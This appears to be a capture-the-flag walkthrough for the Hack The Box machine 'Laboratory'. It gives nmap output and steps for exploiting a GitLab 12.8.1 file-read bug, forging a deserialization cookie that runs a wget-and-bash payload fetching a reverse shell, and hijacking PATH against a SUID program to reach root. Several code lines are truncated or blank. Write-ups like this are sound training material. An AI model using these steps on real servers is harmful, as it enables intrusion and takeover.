Starting Nmap 7.91 ( ) at 2020-11-15 01:48 MST
Nmap scan report for
Host is up (0.056s latency).
Not shown: 65532 filtered ports
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 25:ba:64:8f:79:9d:5d:95:97:2c:1b:b2:5e:9b:55:0d (RSA)
| 256 28:00:89:05:55:f9:a2:ea:3c:7d:70:ea:4d:ea:60:0f (ECDSA)
|_ 256 77:20:ff:e9:46:c0:68:92:1a:0b:21:29:d1:53:aa:87 (ED25519)
80/tcp open http Apache httpd 2.4.41
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Did not follow redirect to https://laboratory.htb/
443/tcp open ssl/http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: The Laboratory
| ssl-cert: Subject: commonName=laboratory.htb
| Subject Alternative Name: DNS:git.laboratory.htb
| Not valid before: 2020-07-05T10:39:28
|_Not valid after: 2024-03-03T10:39:28
| tls-alpn:
|_ http/1.1
Service Info: Host: laboratory.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 254.92 seconds


Using this vuln:


I am using LFI to steal the key (basically a seed) and then load a local instance with that key. Doing so is like having an exact copy of the program which means they generate the same cookies. Using those cookies, I can run shell commands as git

1. Create account on Gitlab

2. Create 2 projects

3. Create an issue using the LFI vuln to get /var/opt/gitlab/gitlab-rails/etc/secrets.yml

4. Create your own Gitlab 12.8.1 instance

5. On your own system update /etc/gitlab/gitlab-secrets.json with the secret

6. Execute the commands to get the git user on HTB to execute commands. In this case download a reverse shell and then execute it

request =

request.env["action_dispatch.cookies_serializer"] = :marshal

cookies = request.cookie_jar

erb ="<%= ` [command here] ` %>")

erb ="<%= ` wget --timeout 5 --tries 2-; bash` %>")

depr =, :result, "@result",

cookies.signed[:cookie] = depr

puts cookies[:cookie]

7. Send curl requests with the cookie to get the user to execute the command

curl -k 'https://git.laboratory.htb' -b "remember_user_token={output from cookie]"

8. Start rails console and update user1 password. Use creds to sign into gitlab

u = User.where(id:1).first

9. Find dexter's private key in securedocker

10.Sign in a dexter, get user.txt flag

11. Use a tool like or use "find" to find programs with SUID. There is one program that "docker (UID 998)" is using.

12. Read the method names by using strings

13. Make a malicious chmod program with reverse shell

14. Add the directory with malicous program to PATH PATH={dir here}:$PATH

15. Run docker-security program. Get root shell

16. Own Root